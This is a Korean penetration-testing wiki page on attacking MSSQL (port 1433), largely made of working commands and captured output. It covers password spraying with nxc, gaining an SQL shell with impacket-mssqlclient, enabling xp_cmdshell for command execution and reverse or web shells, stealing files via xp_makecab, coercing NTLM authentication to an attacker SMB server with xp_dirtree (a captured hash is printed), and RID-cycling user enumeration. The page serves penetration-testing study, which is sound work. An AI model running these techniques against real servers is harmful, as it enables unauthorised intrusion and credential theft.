1433 - MSSQL

MSSQL 프로토콜은 어떠한 계정정보도 존재하지 않는다면 할 수 있는 것은 제한됩니다.

하지만 유저 이름 목록을 가졌을 땐 패스워드 스프레잉 공격이 가능하며

MSSQL은 Windows Local 계정과 연동이 되기 때문에

로컬에 유저 정보를 획득 시 SQL 콘솔을 통한 로컬 크리덴셜 탈취 및 쉘 획득 가능성이 존재합니다.

원격 접속은 다음 명령을 통해서 가능합니다.

# 명령어 양식
impacket-mssqlclient <Domain>/<USER>:<PASS>@<IP> -windows-auth

# 실습
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-mssqlclient pentesting.wiki/wiki:password123!@10.0.2.10 -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PENTESTING\wiki  guest@master)>

SQL 쉘 획득 이후 사용 가능한 XP 프로시저 목록을 확인하여

Windows Local에 관련된 공격 가능성을 탐색합니다.

SELECT name FROM dbo.sysobjects WHERE name like 'xp%'

Methodology

Password Spraying

# 명령어 양식
nxc mssql <IP> -u <username.txt> -p <PASS> --continue-on-success

# 실습
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc mssql 10.0.2.10 -u users.txt -p 'password123!'                                           
MSSQL       10.0.2.10    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pentesting.wiki)
...
MSSQL       10.0.2.10    1433   DC01             [+] pentesting.wiki\wiki:password123!

Shell Connection

데이터베이스 쉘을 획득한 이후에는 적절한 권한만 있다면 커맨드 쉘을 획득할 수 있습니다.

먼저 쉘 사용을 위해 xp_cmdshell 서비스를 활성화 합니다.

다만 이 명령에는 권한이 요구될 수도 있습니다.

SQL (PENTESTING\wiki  dbo@master)> enable_xp_cmdshell
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

활성화가 성공했다면 아래 명령을 통해 명령 실행이 가능합니다.

EXEC xp_cmdshell 'whoami';

이 명령을 통해서 원격으로 리버스 쉘을 로컬로 옮긴 후 실행하거나

웹 쉘을 웹 디렉토리에 다운로드 후 접속하여 사용할 수 있습니다.

Enumeration

권한이 부족하여 커맨드 쉘 획득에 실패했다면 다른 방법으로 정보수집을 시도할 수 있습니다.

# 디렉토리 하위 목록 나열
xp_dirtree <path>

xp_dirtree, xp_makecab 프로시저가 활성화 되어있지만

커맨드 쉘을 연결하기 위한 xp_cmdshell을 사용할 수 없는 상태에서는

서버에서 탈취하고자 하는 파일을 xp_makecab을 사용하여 압축한 뒤,

그것을 웹 디렉토리에 업로드하여 브라우저를 통해 접근함으로써 파일을 탈취할 수 있습니다.

브라우저는 접속한 경로의 파일이 압축 형태일 경우 기본적으로 다운로드 하는 성질이 있기 때문입니다.

Steal NTLM Response

xp_dirtree는 Windows 로컬의 파일을 탐색하는 명령입니다.

파일 탐색기에서 \\<IP>\share 와 같이 특정 IP의 SMB 쉐어 포맷을 입력하게 되면

해당 주소가 SMB 서버인지 확인하기 위해서 Windows는 주소에 연결을 시도합니다.

연결을 하는 과정에서 SMB 서버가 NTLM 인증을 요구하면 클라이언트는

현재 사용자의 자격증명을 사용한 응답을 하게 되는데,

이때 서버로 전송하는 NT Hash로 암호화된 챌린지에 대한 응답을 통해

해쉬 크래킹을 시도 할 수 있습니다.

먼저 Kali 환경에서 SMB 서버를 활성화 합니다.

# 명령어 양식
impacket-smbserver share . -smb2support

# 실습
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

활성화 한 서버의 주소와 쉐어를 xp_dirtree 명령어 인자로 전달합니다.

# 명령어 양식
xp_dirtree \\<IP>\<share>

# 실습
SQL (PublicUser  guest@master)> xp_dirtree \\10.10.14.25\share
subdirectory   depth   file   
------------   -----   ----

Kali의 SMB 서버에 수신된 NTLM 챌린지 응답 메시지를 확인합니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.202,50625)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:cc211f663243fabefad05e5eb66e612e:0101000000000000003469c5af38db01a2ee1a1d69e3619300000000010010005600540071006400610066006b004900030010005600540071006400610066006b004900020010006b0055006e00510064006e0075006400040010006b0055006e00510064006e007500640007000800003469c5af38db01060004000200000008003000300000000000000000000000003000005555c07756eeb0101e374b063fa214d2e03534e9eb2cccf1b04cd95decc97b6c0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320035000000000000000000
[*] Closing down connection (10.10.11.202,50625)
[*] Remaining connections []

Username Enumeration

MSSQL은 Windows와 연결되기 때문에 도메인 유저의 SID를 가져오는 것이 가능합니다.

반대로 이용하면 도메인에 반드시 존재하는 계정을 질의하여 SID를 얻는다면

SID의 RID 부분만 올려감에 따라 RID Cycling공격이 가능합니다.

# Domain Administrator SID 획득
MSSQL > select sys.fn_varbintohexstr(SUSER_SID('<Domain>\Administrator'))

# python으로 코드 제작 후 파일로 저장
for i in range(500, 10000 + 1, 1):
    print(f"select (SUSER_SNAME(SID_BINARY(N'<SID>-{i}')))")
    
# impacket의 file 플래그를 사용하여 쿼리 자동 삽입 후 도메인 유저 결과 저장
impacket-mssqlclient <User@IP> -file rids.txt | tee result.txt

# result.txt에서 유효한 도메인 유저 목록만 추출
cat result.txt | grep --text -i <Domain> | cut -d '\' -f 2 > DomainUsers.txt

References

Previous389/636 - LDAP Next5985/5986 - wsman

Last updated 4 months ago

Was this helpful?